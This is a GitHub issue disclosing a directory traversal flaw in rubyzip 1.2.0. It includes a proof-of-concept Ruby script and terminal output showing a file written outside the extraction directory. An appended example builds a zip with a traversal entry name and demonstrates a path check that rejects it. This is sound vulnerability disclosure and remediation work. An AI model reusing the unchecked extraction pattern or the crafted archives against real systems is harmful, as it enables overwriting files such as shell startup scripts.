
Directory traversal vulnerability #315

Closed

Description

@ecneladis

Overview

The rubyzip module allows overwriting or creating arbitrary files via relative filenames, and thus executing malicious code, e.g. by writing to /etc/ld.so.preload, ~/.bashrc etc.

Proof of concept:

>> unzip traversal.zip
Archive:  traversal.zip
warning:  skipped "../" path component(s) in ../../../../../../../../../../../../../../tmp/zip_attack123
  inflating: tmp/zip_attack123

>> ls -al /tmp/zip_attack123
ls: cannot access '/tmp/zip_attack123': No such file or directory

>> ruby rubyzip_test_traversal.rb
Invalid date/time in zip entry
Extracting ../../../../../../../../../../../../../../tmp/zip_attack123
Invalid date/time in zip entry
>> ls -al /tmp/zip_attack123
-rw-r--r-- 1 anon wheel 11 Jan 31 23:24 /tmp/zip_attack123

rubyzip_test_traversal.rb:

require 'zip'

# Proof of concept: each entry is extracted to the path given by its own
# name. Nothing strips "../" components or rejects absolute names, so an
# entry named "../../../../tmp/zip_attack123" is written outside the
# current working directory.
Zip::File.open('traversal.zip') do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end

Vulnerable version and test environment

>> uname -rsv
Darwin 16.3.0 Darwin Kernel Version 16.3.0: Thu Nov 17 20:23:58 PST 2016; root:xnu-3789.31.2~1/RELEASE_X86_64
>> ruby --version
ruby 2.3.3p222 (2016-11-21 revision 56859) [x86_64-darwin16]
>> gem list | grep zip
rubyzip (1.2.0)

Analogous vulnerability in minitar gem: halostatue/minitar#16
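The attack and the fix from the report above in stand-alone Ruby, as an added example that is not part of the issue or of rubyzip's own code. It uses only the standard library (Zlib, FileUtils, Dir.mktmpdir): build_zip writes a minimal stored-method archive whose entry names are taken verbatim, so a name such as ../../../../tmp/zip_attack123 (modelled on the PoC) lands in the archive unchanged; each_entry reads the central directory back; safe_destination is the check the PoC script lacks, resolving the entry name under the destination directory and refusing anything that escapes it (traversal, absolute paths and ~ expansion all fail); safe_extract applies it before writing. The function names and the two-entry sample archive are this example's own assumptions. With rubyzip the same check would go before entry.extract, passing the result of safe_destination as the destination instead of entry.name.

```ruby
require 'zlib'
require 'fileutils'
require 'tmpdir'

# Build a minimal ZIP archive (stored entries, no compression) from
# { "entry name" => "contents" }. The name is written verbatim, so an
# attacker-chosen "../../tmp/x" ends up in the archive exactly as given.
# Constructed for this example; only produces what each_entry can read.
def build_zip(entries)
  local = String.new(encoding: Encoding::BINARY)
  central = String.new(encoding: Encoding::BINARY)
  entries.each do |name, data|
    name = name.b
    data = data.b
    crc = Zlib.crc32(data)
    offset = local.bytesize
    # Local file header: sig, version, flags, method(0 = stored), time, date,
    # crc, compressed size, uncompressed size, name length, extra length
    local << [0x04034b50, 20, 0, 0, 0, 0, crc, data.bytesize, data.bytesize,
              name.bytesize, 0].pack('VvvvvvVVVvv') << name << data
    # Central directory header for the same entry (points back at offset)
    central << [0x02014b50, 20, 20, 0, 0, 0, 0, crc, data.bytesize, data.bytesize,
                name.bytesize, 0, 0, 0, 0, 0, offset].pack('VvvvvvvVVVvvvvvVV') << name
  end
  # End of central directory record
  eocd = [0x06054b50, 0, 0, entries.size, entries.size,
          central.bytesize, local.bytesize, 0].pack('VvvvvVVv')
  local + central + eocd
end

# Walk the central directory and yield [name, data] for every entry.
# Only stored entries are handled, which is all build_zip produces.
def each_entry(zip)
  zip = zip.b
  eocd = zip.rindex([0x06054b50].pack('V'))
  raise 'no end-of-central-directory record' unless eocd
  count = zip[eocd + 10, 2].unpack1('v')
  pos = zip[eocd + 16, 4].unpack1('V')
  count.times do
    raise 'bad central directory header' unless zip[pos, 4].unpack1('V') == 0x02014b50
    method = zip[pos + 10, 2].unpack1('v')
    usize = zip[pos + 24, 4].unpack1('V')
    name_len, extra_len, comment_len = zip[pos + 28, 6].unpack('vvv')
    local_off = zip[pos + 42, 4].unpack1('V')
    name = zip[pos + 46, name_len]
    raise 'only stored entries are supported' unless method == 0
    # Local header is 30 fixed bytes, then name and extra field, then data
    lname, lextra = zip[local_off + 26, 4].unpack('vv')
    yield name, zip[local_off + 30 + lname + lextra, usize]
    pos += 46 + name_len + extra_len + comment_len
  end
end

# The missing check: resolve entry_name under dest_dir and refuse anything
# that escapes it. "../" components, absolute names and "~" expansion all
# produce a path outside dest_dir and raise ArgumentError.
def safe_destination(dest_dir, entry_name)
  base = File.expand_path(dest_dir)
  target = File.expand_path(entry_name, base)
  unless target == base || target.start_with?(base + File::SEPARATOR)
    raise ArgumentError, "entry #{entry_name.inspect} escapes #{base}"
  end
  target
end

# Extract every entry into dest_dir, skipping (and reporting) entries whose
# names would land outside it. Returns { written: [...], rejected: [...] }.
def safe_extract(zip, dest_dir)
  written = []
  rejected = []
  each_entry(zip) do |name, data|
    begin
      path = safe_destination(dest_dir, name)
    rescue ArgumentError
      rejected << name
      next
    end
    FileUtils.mkdir_p(File.dirname(path))
    File.binwrite(path, data)
    written << path
  end
  { written: written, rejected: rejected }
end

if __FILE__ == $PROGRAM_NAME
  # Sample archive modelled on the PoC: one traversal entry, one benign entry
  zip = build_zip('../../../../../../../../tmp/zip_attack123' => 'owned',
                  'README.txt' => 'hello')
  Dir.mktmpdir { |dir| p safe_extract(zip, dir) }
end
```

Running the script writes only README.txt under the temporary directory and reports the traversal entry as rejected; nothing is created in /tmp. The check deliberately compares fully expanded paths rather than scanning the name for "../", so names like "foo/../../x" or "/etc/passwd" are caught by the same rule.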
